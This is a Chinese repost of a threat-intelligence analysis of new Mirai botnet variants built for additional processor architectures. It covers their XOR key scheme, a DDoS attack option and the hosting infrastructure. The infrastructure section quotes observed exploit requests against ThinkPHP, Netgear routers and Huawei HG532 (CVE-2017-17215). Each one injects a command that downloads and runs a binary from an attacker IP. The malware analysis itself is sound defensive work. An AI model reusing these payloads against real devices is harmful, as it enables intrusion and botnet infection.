内容简介:2019年2月底,unit 42研究人员发现了新出现的为新处理器架构编译的Mirai样本。虽然Mirai的源码在2016年就公开了,但是它的攻击目标是特定的一批处理器架构集。Unit 42研究人员发现了专为Altera Nios II, OpenRISC, Tensilica Xtensa和Xilinx MicroBlaze处理器的样本。这是Mirai第二次扩展新的处理器架构,上一次是2018年1月发现的攻击ARC CPU的样本。这说明Mirai的开发者还在不断更新技术,并攻击IOT设备。本文主要介绍新发现
概述
2019年2月底,unit 42研究人员发现了新出现的为新处理器架构编译的Mirai样本。虽然Mirai的源码在2016年就公开了,但是它的攻击目标是特定的一批处理器架构集。
Unit 42研究人员发现了专为Altera Nios II, OpenRISC, Tensilica Xtensa和Xilinx MicroBlaze处理器的样本。这是Mirai第二次扩展新的处理器架构,上一次是2018年1月发现的攻击ARC CPU的样本。这说明Mirai的开发者还在不断更新技术,并攻击IOT设备。
本文主要介绍新发现的样本相关的基础设施,以及其他Mirai样本如何使用已知的漏洞利用等。
新样本的新特征
除了支持新的处理器架构外,研究人员还在新样本中发现了以下特征:
加密算法。新样本对原来Mirai代码中使用的标准字节XOR算法进行了修改。使用11个8字节的key,所有都使用字节级的XOR来获取最终的key,代码如下:
tablekeys = [0xdeadbeef, 0x85DAB8BF, 0xDEEDEEBF, 0xDEABBEAF, 0xDBBD45BF, 0x246584EF, 0x85BFE8BF, 0xD68395BF, 0xDBAAAAAF, 0x0DAABEEF] xor_key = 0 for key in tablekeys: xor_key ^= key&0xff ^ (key>>8 & 0xff) ^ (key>>16 & 0xfF) ^ (key>>24 & 0xff)
这相当于与0x5A进行字节级的XOR运算。
attack_method_ovh。样本中含有以下参数的DDOS攻击选项:
ATK_OPT_IP_TOS = 0 ATK_OPT_IP_IDENT = 0xFFFF ATK_OPT_IP_TTL = 64 ATK_OPT_IP_DF = 1 ATK_OPT_SPORT = 0xFFFF ATK_OPT_DPORT = 0xFFFF ATK_OPT_SEQRND = 0xFFFF ATK_OPT_ACKRND = 0 ATK_OPT_URG = 0 ATK_OPT_ACK = 0 ATK_OPT_PSH = 0 ATK_OPT_RST = 0 ATK_OPT_SYN = 1 ATK_OPT_FIN = 0 ATK_OPT_SOURCE = LOCAL_ADDR
这与原来Mirai源代码中的攻击方法“TCP SYN” (attack_method_tcpsyn)的参数是一样的,所以为什么要将相同的参数加入到一个新的攻击方法中呢?目前尚不清楚原因。据此,研究人员发现了从2018年11月开始就应用该方法的样本。
基础设施
研究人员在一个IP地址上发现了多个最新的样本,但2019年2月22日开始,该服务器将这些文件列表隐藏起来了,但是还为文件提供web服务。
图1. 保存Mirai变种代码的目录
在2月22日之前,该IP地址还提供含有以下漏洞利用的Mirai样本。这些漏洞利用都是在之前的Mirai样本中使用过的。研究人员根据这些漏洞利用推测这些变种应该是同一波攻击者在使用,漏洞利用如下:
·ThinkPHP远程代码执行漏洞
利用格式:
GET /to/thinkphp5.1.29/?s=index/ hinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= ‘wget http://178.62.227[.]13/wrgjwrgjwrg246356356356/hx86 -O /tmp/Hito; chmod 777 /tmp/Hito; /tmp/Hito wget.exploit.selfrep.thinkphp’ HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Hito/2.0
· D-Link DSL2750B OS命令注入漏洞
利用格式:
· Netgear远程代码执行漏洞
利用格式:
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;/bin/busybox+wget+-g+178.62.227[.]13+-l+/tmp/binary+-r+/wrgjwrgjwrg246356356356/hmips;+/bin/busybox+chmod 777+*+/tmp/binary;/tmp/binary+wget.selfrep.exploit.netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
· CVE-2014-8361
利用格式:
· CVE-2017-17215
利用格式:
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: */* Authorization: Digest username=”dslf-config”, realm=”HuaweiHomeGateway”, nonce=”88645cefb1f9ede0e336e3569d75ee30″, uri=”/ctrlt/DeviceUpgrade_1″, response=”3612f843a42db38f48f59d2a3597e19c”, algorithm=”MD5″, qop=”auth”, nc=00000001, cnonce=”248d1a2560100669″ <?xml version=”1.0″ ?><s:Envelope xmlns:s=”http://schemas.xmlsoap.org/soap/envelope/” s:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/”><s:Body><u:Upgrade xmlns:u=”urn:schemas-upnp-org:service:WANPPPConnection:1″><NewStatusURL>$(/bin/busybox wget -g 178.62.227.13 -l /tmp/binary -r /wrgjwrgjwrg246356356356/hmips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary wget.selfrep.exploit.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
总结
因为Mirai源代码是公开的,因此开源将源代码进行适应其他处理器的编译,以提供给攻击者更大的攻击面。这也说明该恶意软件家族会通过更多的嵌入式设备感染和传播,提供给攻击者更强大的DDOS攻击的能力。
研究人员建议企业和用户对IOT设备及时更新补丁,并不要使用默认口令。
以上所述就是小编给大家介绍的《支持新处理器架构的Mirai变种出现》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:- 优化变种CRC算法
- 警惕Rapid勒索病毒新变种
- Satan变种病毒分析处置手册
- Bluehero挖矿蠕虫变种空降!
- AgentTesla新变种窃取WiFi密码
- 勒索病毒(CrySiS家族)最新变种分析
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
JS 压缩/解压工具
在线压缩/解压 JS 代码
RGB HSV 转换
RGB HSV 互转工具